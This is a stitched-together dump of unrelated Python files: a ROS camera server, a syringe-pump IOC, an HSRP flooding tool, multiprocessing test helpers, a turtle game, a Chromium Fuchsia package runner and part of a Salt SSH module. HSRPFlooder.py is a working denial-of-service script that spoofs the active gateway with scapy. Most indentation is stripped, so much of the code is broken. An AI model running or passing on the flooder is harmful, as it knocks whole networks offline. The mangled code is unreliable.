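def _pressure_roundtrip_selfcheck(pressure=898.75):
    altitude = get_altitude(pressure)
    recovered_sea_level = compute_sea_level(altitude, pressure)
    # the exponents differ slightly between the two formulas, so allow a small tolerance
    assert abs(recovered_sea_level - 1013.25) < 0.5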
def euler_from_quaternion(x, y, z, w, rad=False, approx=1):
"""
Convert a quaternion into euler angles (roll, pitch, yaw)
roll is rotation around x in radians (counterclockwise)
pitch is rotation around y in radians (counterclockwise)
yaw is rotation around z in radians (counterclockwise)
"""
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
if not rad:
roll_x = round(math.degrees(roll_x), approx)
pitch_y = round(math.degrees(pitch_y), approx)
yaw_z = round(math.degrees(yaw_z), approx)
    return roll_x, pitch_y, yaw_z  # in radians, or rounded degrees when rad is False
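# Illustrative only -- not part of the original file: two easy-to-verify cases for the
# conversion above, the identity quaternion and a pure 90-degree yaw.
def _euler_selfcheck():
    assert euler_from_quaternion(0.0, 0.0, 0.0, 1.0) == (0.0, 0.0, 0.0)
    _, _, yaw = euler_from_quaternion(0.0, 0.0, 0.7071068, 0.7071068)
    assert abs(yaw - 90.0) < 0.1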
def main(args=None):
rclpy.init()
parser = argparse.ArgumentParser()
parser.add_argument("--bind", type=str, default=get_ip_address("wlan0"))
parser.add_argument("--port", type=int, default=8080)
parser.add_argument("--width", type=int, default=640)
parser.add_argument("--height", type=int, default=480)
parser.add_argument("--directory", type=str, default="html")
parser.add_argument("--device", type=str, default="jetson")
args = parser.parse_args()
# The parameter "--device" can be integer 0, 1, 2 etc or a string if tis is "jetson" we wil use the jetson caemra as capture device
camera = Camera(args.device, args.width, args.height)
try:
server = ThreadedHTTPServer((args.bind, args.port), CameraHandler)
server.set_camera(camera)
server.set_document_root(args.directory)
logger.info("server started")
thread2 = threading.Thread(target=server.serve_forever)
thread2.start()
r_info = Robot_Info()
# server.serve_forever()
        # Set up a lock and a thread that spins the ROS node
        thread_lock = Lock()
        # thread = threading.Thread(target=rclpy.spin, args=(server))
        thread = threading.Thread(target=rclpy.spin, args=(r_info,))
thread.start()
except KeyboardInterrupt:
logger.info("server is stopping ...")
camera.release()
server.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
r_info.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
device_io.py
|
#!/usr/bin/env python3
import sys
import os
import threading
import atexit
import time
from datetime import datetime
import itertools
from logging import debug,info,warn,error
#Input/Output server library
from caproto.server import pvproperty, PVGroup, ioc_arg_parser, run
from ubcs_auxiliary.threading import new_thread
from numpy import zeros, random, nan
class Server(PVGroup):
RBV = pvproperty(value=nan, units = 'uL', read_only = True, precision = 3)
VAL = pvproperty(value=nan,
units = 'uL',
precision = 3,
upper_ctrl_limit=250.0,
lower_ctrl_limit=0.0,)
VELO = pvproperty(value=nan,
units = 'uL/s',
precision = 3,
upper_ctrl_limit=68.0,
lower_ctrl_limit=0.001)
VALVE = pvproperty(value='', dtype=str, max_length=2)
CMD = pvproperty(value='', max_length=1000, dtype=str)
ACK = pvproperty(value='', max_length=1000, dtype=str, read_only = True)
#MOVN",value = self.moving)
#ERROR
#ERROR_CODE
STATUS = pvproperty(value='unknown', max_length=10, dtype=str, read_only = True)
device = None
# NOTE the decorator used here:
@RBV.startup
async def RBV(self, instance, async_lib):
# This method will be called when the server starts up.
debug('* request method called at server startup')
self.io_get_queue = async_lib.ThreadsafeQueue()
self.io_put_queue = async_lib.ThreadsafeQueue()
self.device.io_put_queue = self.io_put_queue
self.device.io_get_queue = self.io_get_queue
# Loop and grab items from the response queue one at a time
while True:
value = await self.io_put_queue.async_get()
debug(f'Got put request from the device: {value}')
if 'RBV' in list(value.keys()):
await self.RBV.write(value['RBV'])
elif 'VAL' in list(value.keys()):
await self.VAL.write(value['VAL'])
elif 'VELO' in list(value.keys()):
await self.VELO.write(value['VELO'])
elif 'VALVE' in list(value.keys()):
await self.VALVE.write(value['VALVE'])
#@VAL.startup
#async def VAL(self, instance, async_lib):
# self.VAL.value = self.device.get_cmd_position()
@VAL.putter
async def VAL(self, instance, value):
print('Received update for the {}, sending new value {}'.format('VAL',value))
await self.device_ioexecute(pv_name = 'VAL', value = float(value))
return value
@VELO.putter
async def VELO(self, instance, value):
print('Received update for the {}, sending new value {}'.format('VELO',value))
await self.device_ioexecute(pv_name = 'VELO', value = float(value))
return value
@VALVE.putter
async def VALVE(self, instance, value):
print('Received update for the {}, sending new value {}'.format('VALVE',value))
await self.device_ioexecute(pv_name = 'VALVE', value = value)
return value
@CMD.putter
async def CMD(self, instance, value):
print('Received update for the {}, sending new value {}'.format('CMD',value))
await self.device_ioexecute(pv_name = 'CMD', value = value)
return value
async def device_ioexecute(self, pv_name, value):
"""
"""
if self.device is not None:
self.device.ioexecute(pv_name = pv_name, value = value)
async def device_ioread(self, pv_name, value):
"""
"""
pass
def update_pvs(self):
"""
Force update of all PVs. Works only if self.device is assigned. If None, nothing will happen.
"""
if self.device is not None:
pass
else:
pass
class Device_IO(object):
def __init__(self, pump_id, prefix = ''):
"""
"""
from syringe_pump.device import Device
import sys
if pump_id == 1 or pump_id == 3:
orientation = 'Y'
elif pump_id == 2 or pump_id == 4:
orientation = 'Z'
pump = Device()
pump.init(pump_id,0.1,100,orientation,250)
pump.start()
from tempfile import gettempdir
import logging
filename=gettempdir()+f'/syringe_pump_device_io_{pump_id}.log'
print(filename)
logging.basicConfig(filename=filename,
level=logging.DEBUG,
format="%(asctime)s %(levelname)s %(module)s.%(funcName)s: %(message)s")
debug('test write debug')
ioc_options, run_options = ioc_arg_parser(
default_prefix=prefix+ 'SYRINGE'+str(pump_id) + '.',
desc='Run an IOC that does blocking tasks on a worker thread.')
ioc = Server(**ioc_options)
ioc.device = pump
run(ioc.pvdb, **run_options)
def run_ioc(pump_id = 2):
from syringe_pump import device_io
import multiprocessing
p = multiprocessing.Process(target=device_io.Device_IO,args=(pump_id,'TEST:'))
p.start()
return p
if __name__ == '__main__':
pump_id = 1
from syringe_pump.device import Device
import sys
if pump_id == 1 or pump_id == 3:
orientation = 'Y'
elif pump_id == 2 or pump_id == 4:
orientation = 'Z'
pump = Device()
pump.init(pump_id,0.1,100,orientation,250)
pump.start()
from tempfile import gettempdir
import logging
logfile = gettempdir()+f'/syringe_pump_device_io_{str(pump_id)}.log'
logging.basicConfig(level=logging.DEBUG,
format="%(asctime)s %(levelname)s %(module)s.%(funcName)s: %(message)s",
filename=logfile,
)
debug('test write debug')
ioc_options, run_options = ioc_arg_parser(
default_prefix=f'TEST:SYRINGE{str(pump_id)}.',
desc='Run an IOC that does blocking tasks on a worker thread.')
ioc = Server(**ioc_options)
ioc.device = pump
ioc.update_pvs()
    # This is where start_up happens!
run(ioc.pvdb, **run_options)
|
HSRPFlooder.py
|
#!/usr/bin/python
#
# Proof-of-concept HSRP Active router Flooder triggering outbound gateway Denial of Service. Not fully tested, not working stably at the moment.
#
# Python requirements:
# - scapy
#
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
#
# os and time are used below; import them explicitly rather than relying on scapy's star import
import os
import sys
import time
import struct
import string
import random
import argparse
import multiprocessing
import socket
import fcntl
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'interface' : None,
'processors' : 1,
# HSRP Fields
'group' : 1,
'priority' : 255,
'virtual-ip' : '',
'source-ip' : '',
'dest-ip' : '224.0.0.2',
'auth' : 'cisco\x00\x00\x00',
}
stopThreads = False
#
# ===============================================
#
class Logger:
@staticmethod
def _out(x):
if config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def generatePacket():
ip = IP()
ip.src = config['source-ip']
ip.dst = config['dest-ip']
udp = UDP()
udp.sport = 1985
udp.dport = 1985
hsrp = HSRP()
hsrp.version = 0
hsrp.opcode = 1
hsrp.group = config['group']
hsrp.priority = config['priority']
hsrp.virtualIP = config['virtual-ip']
hsrp.auth = config['auth']
hsrppacket = ip / udp / hsrp
return hsrppacket
def flooder(num):
Logger.info('Starting task: {}'.format(num))
while stopThreads != True:
try:
p = generatePacket()
if stopThreads: raise KeyboardInterrupt
send(p, verbose = config['verbose'], iface = config['interface'])
except KeyboardInterrupt:
break
Logger.info('Stopping task: {}'.format(num))
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def parseOptions(argv):
global config
print('''
:: HSRP Flooding / Denial of Service tool
Floods the interface with Active router Coup HSRP packets.
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-I', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--source', metavar='SRC', default='', help='Specify source IP address. By default: own IP')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
hsrp = parser.add_argument_group('HSRP Fields', 'Specifies contents of interesting HSRP fields in packets to send')
hsrp.add_argument('-g', '--group', help = 'Group number. Default: 1')
hsrp.add_argument('-p', '--priority', help = 'Active router priority. Default: 255')
hsrp.add_argument('-i', '--virtual-ip', dest='virtualip', help = 'Virtual IP of the gateway to spoof.')
hsrp.add_argument('-a', '--auth', help = 'Authentication string. Default: cisco')
args = parser.parse_args()
if not args.interface:
print('[!] Interface option is mandatory.')
sys.exit(-1)
config['verbose'] = args.verbose
config['interface'] = args.interface
#config['processors'] = multiprocessing.cpu_count()
if args.group: config['group'] = args.group
if args.priority: config['priority'] = args.priority
if args.virtualip: config['virtual-ip'] = args.virtualip
if args.auth: config['auth'] = args.auth
if args.source: config['source-ip'] = args.source
else: config['source-ip'] = get_ip_address(config['interface'])
print('Using source IP address: {}'.format(config['source-ip']))
return args
def main(argv):
global stopThreads
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i,))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding on dev: {}. Press CTRL-C to stop that.'.format(config['interface']))
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
if __name__ == '__main__':
main(sys.argv)
|
util_run_multi.py
|
from time import sleep, time
from decorator import FunctionMaker
from logging.handlers import QueueHandler, QueueListener
from typing import List, Tuple, Dict, Any
from machin.parallel.distributed import World, get_world as gw
from machin.parallel.process import Process, ProcessException
import sys
import dill
import pytest
import itertools
import logging
import multiprocessing as mp
import socket
import random
import numpy as np
import torch as t
from contextlib import closing
get_world = gw
# use queue handler
default_logger = logging.getLogger("multi_default_logger")
default_logger.setLevel(logging.INFO)
class SafeExit(Exception):
"""
Raise this if the process needs to be terminated safely while
other processes are still running.
"""
pass
def find_free_port():
# this function is used to find a free port
# since we are using the host network in docker
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("localhost", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
def process_main(pipe, log_queue):
handler = logging.handlers.QueueHandler(log_queue)
default_logger.addHandler(handler)
# fix randomness
t.manual_seed(0)
np.random.seed(0)
random.seed(0)
while True:
func, args, kwargs = dill.loads(pipe.recv())
pipe.send(func(*args, **kwargs))
@pytest.fixture(scope="session", autouse=True)
def ctx(pytestconfig):
multiprocess_method = pytestconfig.getoption("multiprocess_method")
assert multiprocess_method in ("forkserver", "spawn",), (
f"Multiprocess starting method must be forkserver or spawn, "
f"but get {multiprocess_method}"
)
if not sys.platform.startswith("linux"):
default_logger.info(
f"Platform {sys.platform} is not linux, use spawn to start processes."
)
multiprocess_method = "spawn"
ctx = mp.get_context(multiprocess_method)
if multiprocess_method == "forkserver":
# preload library to improve testing speed
ctx.set_forkserver_preload(["machin"])
return ctx
@pytest.fixture(scope="function")
def processes(ctx):
pipes = [mp.Pipe(duplex=True) for _ in [0, 1, 2]]
man = ctx.Manager()
queue = man.Queue()
processes = [
Process(target=process_main, args=(pipes[i][0], queue), ctx=ctx)
for i in [0, 1, 2]
]
handler = logging.StreamHandler()
handler.setFormatter(
logging.Formatter("[%(asctime)s] <%(levelname)s>:%(name)s:%(message)s")
)
ql = QueueListener(queue, handler)
ql.start()
default_logger.addHandler(handler)
for p, i in zip(processes, [0, 1, 2]):
default_logger.info(f"processes {i} started")
p.start()
yield processes, [pi[1] for pi in pipes]
for p, pi, i in zip(processes, pipes, [0, 1, 2]):
# try graceful shutdown first
pi[1].send(dill.dumps((exit, 0, {})))
p.join(timeout=1)
if p.is_alive():
# ungraceful shutdown
default_logger.info(f"processes {i} ungraceful shutdown")
p.terminate()
p.join()
default_logger.removeHandler(handler)
ql.stop()
man.shutdown()
man.join()
default_logger.info("processes stopped")
def exec_with_process(
processes, func, args_list, kwargs_list, expected_results, timeout, *pass_through
):
procs, proc_pipes = processes
args_list = args_list if args_list is not None else itertools.repeat([])
kwargs_list = kwargs_list if kwargs_list is not None else itertools.repeat({})
# possibility of port collision using this method still exists
port = find_free_port()
for pi, rank, args, kwargs in zip(proc_pipes, [0, 1, 2], args_list, kwargs_list):
kwargs["_world_port"] = port
pi.send(dill.dumps((func, [rank] + list(args) + list(pass_through), kwargs)))
results = [None, None, None]
finished = [False, False, False]
begin = time()
while not all(finished):
if time() - begin >= timeout:
raise TimeoutError("Run-multi timeout!")
for p, pi, i in zip(procs, proc_pipes, [0, 1, 2]):
try:
p.watch()
except ProcessException as e:
if "SafeExit" in e.args[0]:
return
else:
raise e
if pi.poll(timeout=1e-1):
results[i] = pi.recv()
finished[i] = True
sleep(1e-1)
if expected_results is not None:
assert results == expected_results
def run_multi(
args_list: List[Tuple[Any]] = None,
kwargs_list: List[Dict[str, Any]] = None,
expected_results: List[Any] = None,
pass_through: List[str] = None,
timeout: int = 60,
):
# pass_through allows you to pass through pytest parameters and fixtures
# to the sub processes, these pass through parameters must be placed
# behind normal args and before kwargs
assert args_list is None or len(args_list) == 3
assert kwargs_list is None or len(kwargs_list) == 3
assert expected_results is None or len(expected_results) == 3
if pass_through is None:
pt_args = ""
else:
pt_args = "," + ",".join(pass_through)
def wrapped(func):
return FunctionMaker.create(
f"w_wrapped_func(processes{pt_args})",
f"""
return exec_with_process(
processes, func, args_list, kwargs_list,
expected_results, timeout{pt_args})
""",
dict(
args_list=args_list,
kwargs_list=kwargs_list,
expected_results=expected_results,
timeout=timeout,
func=func,
exec_with_process=exec_with_process,
),
)
return wrapped
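# Hypothetical usage sketch (not part of the original module), showing how the decorator
# above is meant to combine with the `processes` fixture; `tmp_path` stands in for any
# pytest fixture passed through, and pass-through names come after `rank` and before kwargs:
#
#   @run_multi(expected_results=[0, 1, 2], pass_through=["tmp_path"])
#   @setup_world
#   def test_rank(rank, tmp_path):
#       return rank
#
# pytest then invokes the generated wrapper as test_rank(processes, tmp_path).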
def setup_world(func):
def wrapped(rank, *args, _world_port=9100, **kwargs):
# election function for all tests
default_logger.info(f"Initializing world on {rank}")
world = World(world_size=3, rank=rank, name=str(rank))
default_logger.info(f"World initialized on {rank} using port {_world_port}")
result = func(rank, *args, **kwargs)
world.stop()
default_logger.info(f"World stopped on {rank}")
return result
return wrapped
|
app.py
|
import threading
from random import randint, uniform
from playsound import playsound
from turtle import Screen, Turtle, screensize
from utils.alerts import show_alert
from utils.score import update_scoreboard
from intro import start_intro
screen = Screen()
screen.bgcolor('#000000')
screen.bgpic('./assets/background.gif')
screen.title('Space Junk Collector')
screen.delay(0)
# images
screen.addshape('./assets/collector.gif')
screen.addshape('./assets/satellite-1.gif')
# game state
development = False
ready = False
level = 0
score = 0
junk_list = []
junk_speed = 0.1
from collector import Collector, Bullet
player = Collector()
bullet = Bullet()
def create_junk(num_of_junk):
(x, y) = screensize()
for i in range(num_of_junk):
randomX = randint(-x, x)
randomY = randint(-7, y)
randomWidth = uniform(0.5, 1.5)
randomHeight = uniform(0.5, 1.5)
junk = Turtle()
junk.speed(0)
junk.hideturtle()
junk.shape('./assets/satellite-1.gif')
junk.penup()
junk.shapesize(randomWidth, randomHeight)
junk.goto(randomX, randomY)
junk.showturtle()
junk_list.append(junk)
def level_up():
global level, ready, junk_speed
ready = True
level += 1
if level == 1 or development: player.show()
update_scoreboard(score, level)
create_junk(3 * level)
junk_speed += level
if not development: start_intro(level_up)
else: level_up()
# keys
screen.onkeypress(lambda: player.left() if ready else None, 'a')
screen.onkeypress(lambda: player.left() if ready else None, 'Left')
screen.onkeypress(lambda: player.right() if ready else None, 'd')
screen.onkeypress(lambda: player.right() if ready else None, 'Right')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'w')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'Up')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'space')
screen.listen()
# game loop / object collision detection
def game():
global score, level
(player_x, player_y) = player.position()
if bullet.isvisible():
bullet.move()
for index, junk in list(enumerate(junk_list)):
if bullet.collided_with(junk):
junk.clear()
junk.hideturtle()
junk_list.remove(junk)
score += 1
update_scoreboard(score, level)
# play sound
def play_collect_sound():
thread = threading.Thread(
target = lambda: playsound('./assets/audio/collect_sound_effect.mp3', block=False),
name = 'soundThread'
)
thread.start()
play_collect_sound()
if len(junk_list) == 0:
# no more junk, level up!
bullet.destroy()
level_up()
for junk in junk_list:
(screen_x, screen_y) = screensize()
(x, y) = junk.position()
if (abs(x + 10) >= screen_x):
heading = junk.heading()
junk.setheading(180 - heading)
if (abs(x - 10) <= screen_x):
heading = junk.heading()
junk.setheading(-heading)
# consistent speed
mod = ((junk_speed * len(junk_list)) / (junk_speed * 3)) / 10
junk.forward(mod)
screen.ontimer(game, 1)
game()
update_scoreboard(score, level)
screen.update()
screen.mainloop()
|
run_package.py
|
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Contains a helper function for deploying and executing a packaged
executable on a Target."""
from __future__ import print_function
import common
import hashlib
import logging
import multiprocessing
import os
import re
import select
import subprocess
import sys
import time
import threading
import uuid
from symbolizer import RunSymbolizer
from symbolizer import SymbolizerFilter
FAR = common.GetHostToolPathFromPlatform('far')
# Amount of time to wait for the termination of the system log output thread.
_JOIN_TIMEOUT_SECS = 5
def _AttachKernelLogReader(target):
"""Attaches a kernel log reader as a long-running SSH task."""
logging.info('Attaching kernel logger.')
return target.RunCommandPiped(['dlog', '-f'], stdin=open(os.devnull, 'r'),
stdout=subprocess.PIPE)
def _BuildIdsPaths(package_paths):
"""Generate build ids paths for symbolizer processes."""
build_ids_paths = map(
lambda package_path: os.path.join(
os.path.dirname(package_path), 'ids.txt'),
package_paths)
return build_ids_paths
class SystemLogReader(object):
"""Collects and symbolizes Fuchsia system log to a file."""
def __init__(self):
self._listener_proc = None
self._symbolizer_proc = None
self._system_log = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Stops the system logging processes and closes the output file."""
if self._symbolizer_proc:
self._symbolizer_proc.kill()
if self._listener_proc:
self._listener_proc.kill()
if self._system_log:
self._system_log.close()
def Start(self, target, package_paths, system_log_file):
"""Start a system log reader as a long-running SSH task."""
logging.debug('Writing fuchsia system log to %s' % system_log_file)
self._listener_proc = target.RunCommandPiped(['log_listener'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self._system_log = open(system_log_file,'w', buffering=1)
self._symbolizer_proc = RunSymbolizer(self._listener_proc.stdout,
self._system_log,
_BuildIdsPaths(package_paths))
class MergedInputStream(object):
"""Merges a number of input streams into a UNIX pipe on a dedicated thread.
Terminates when the file descriptor of the primary stream (the first in
the sequence) is closed."""
def __init__(self, streams):
assert len(streams) > 0
self._streams = streams
self._output_stream = None
self._thread = None
def Start(self):
"""Returns a pipe to the merged output stream."""
read_pipe, write_pipe = os.pipe()
# Disable buffering for the stream to make sure there is no delay in logs.
self._output_stream = os.fdopen(write_pipe, 'w', 0)
self._thread = threading.Thread(target=self._Run)
self._thread.start();
return os.fdopen(read_pipe, 'r')
def _Run(self):
streams_by_fd = {}
primary_fd = self._streams[0].fileno()
for s in self._streams:
streams_by_fd[s.fileno()] = s
# Set when the primary FD is closed. Input from other FDs will continue to
# be processed until select() runs dry.
flush = False
# The lifetime of the MergedInputStream is bound to the lifetime of
# |primary_fd|.
while primary_fd:
# When not flushing: block until data is read or an exception occurs.
rlist, _, xlist = select.select(streams_by_fd, [], streams_by_fd)
if len(rlist) == 0 and flush:
break
for fileno in xlist:
del streams_by_fd[fileno]
if fileno == primary_fd:
primary_fd = None
for fileno in rlist:
line = streams_by_fd[fileno].readline()
if line:
self._output_stream.write(line + '\n')
else:
del streams_by_fd[fileno]
if fileno == primary_fd:
primary_fd = None
# Flush the streams by executing nonblocking reads from the input file
# descriptors until no more data is available, or all the streams are
# closed.
while streams_by_fd:
rlist, _, _ = select.select(streams_by_fd, [], [], 0)
if not rlist:
break
for fileno in rlist:
line = streams_by_fd[fileno].readline()
if line:
self._output_stream.write(line + '\n')
else:
del streams_by_fd[fileno]
def _GetComponentUri(package_name):
return 'fuchsia-pkg://fuchsia.com/%s#meta/%s.cmx' % (package_name,
package_name)
class RunPackageArgs:
"""RunPackage() configuration arguments structure.
symbolizer_config: A newline delimited list of source files contained
in the package. Omitting this parameter will disable symbolization.
system_logging: If set, connects a system log reader to the target.
"""
def __init__(self):
self.symbolizer_config = None
self.system_logging = False
@staticmethod
def FromCommonArgs(args):
run_package_args = RunPackageArgs()
run_package_args.system_logging = args.include_system_logs
return run_package_args
def _DrainStreamToStdout(stream, quit_event):
"""Outputs the contents of |stream| until |quit_event| is set."""
while not quit_event.is_set():
rlist, _, _ = select.select([ stream ], [], [], 0.1)
if rlist:
line = rlist[0].readline()
if not line:
return
print(line.rstrip())
def RunPackage(output_dir, target, package_paths, package_name,
package_args, args):
"""Installs the Fuchsia package at |package_path| on the target,
executes it with |package_args|, and symbolizes its output.
output_dir: The path containing the build output files.
target: The deployment Target object that will run the package.
package_paths: The paths to the .far packages to be installed.
package_name: The name of the primary package to run.
package_args: The arguments which will be passed to the Fuchsia process.
args: Structure of arguments to configure how the package will be run.
Returns the exit code of the remote package process."""
system_logger = (
_AttachKernelLogReader(target) if args.system_logging else None)
try:
if system_logger:
# Spin up a thread to asynchronously dump the system log to stdout
# for easier diagnoses of early, pre-execution failures.
log_output_quit_event = multiprocessing.Event()
log_output_thread = threading.Thread(
target=
lambda: _DrainStreamToStdout(system_logger.stdout, log_output_quit_event)
)
log_output_thread.daemon = True
log_output_thread.start()
with target.GetAmberRepo():
target.InstallPackage(package_paths)
if system_logger:
log_output_quit_event.set()
log_output_thread.join(timeout=_JOIN_TIMEOUT_SECS)
logging.info('Running application.')
command = ['run', _GetComponentUri(package_name)] + package_args
process = target.RunCommandPiped(
command,
stdin=open(os.devnull, 'r'),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
if system_logger:
output_stream = MergedInputStream(
[process.stdout, system_logger.stdout]).Start()
else:
output_stream = process.stdout
# Run the log data through the symbolizer process.
output_stream = SymbolizerFilter(output_stream,
_BuildIdsPaths(package_paths))
for next_line in output_stream:
print(next_line.rstrip())
process.wait()
if process.returncode == 0:
logging.info('Process exited normally with status code 0.')
else:
# The test runner returns an error status code if *any* tests fail,
# so we should proceed anyway.
logging.warning(
'Process exited with status code %d.' % process.returncode)
finally:
if system_logger:
logging.info('Terminating kernel log reader.')
log_output_quit_event.set()
log_output_thread.join()
system_logger.kill()
return process.returncode
|
__init__.py
|
"""
Create ssh executor system
"""
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import queue
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.fileclient
import salt.loader
import salt.log.setup
import salt.minion
import salt.output
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
from salt._logging.mixins import MultiprocessingStateMixin
from salt.template import compile_template
from salt.utils.platform import is_junos, is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"
# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
# no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
# no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
# RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
# Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
# Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"
# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
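# Illustrative sketch, not part of the original module: the delimiter above is used roughly
# like this when post-processing the wrapped command's output (`raw_stdout` is a hypothetical
# variable standing in for whatever came back over SSH):
#
#   parts = re.split(RSTR_RE, raw_stdout, 1)
#   if len(parts) == 2:
#       shim_noise, salt_output = parts   # everything after RSTR came from salt
#   else:
#       salt_output = None                # no RSTR: the shim itself failed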
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
# interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
# some constructs are needed to keep it clean.
# NOTE:
# * SSH_SH_SHIM is generic and can be used to load+exec *any* python
# script on the target.
# * SSH_PY_SHIM is in a separate file rather than stuffed in a string
# in salt/client/ssh/__init__.py - this makes testing *easy* because
# it can be invoked directly.
# * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
# string. This makes the python script "armored" so that it can
# all be passed in the SSH command and will not need special quoting
# (which likely would be impossible to do anyway)
# * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
# big (~7.5k). If this proves problematic for an SSH command we
# might try simply invoking "/bin/sh -s" and passing the formatted
# SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
# - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
# - DEBUG - enable shim debugging (any non-zero string enables)
# - SUDO - load python and execute as root (any non-zero string enables)
# - SSH_PY_CODE - base64-encoded python code to execute
# - SSH_PY_ARGS - arguments to pass to python code
# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
# python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python
# Note the list-comprehension syntax to define SSH_SH_SHIM is needed
# to be able to define the string with indentation for readability but
# still strip the white space for compactness and to avoid issues with
# some multi-line embedded python code having indentation errors
SSH_SH_SHIM = "\n".join(
[
s.strip()
for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
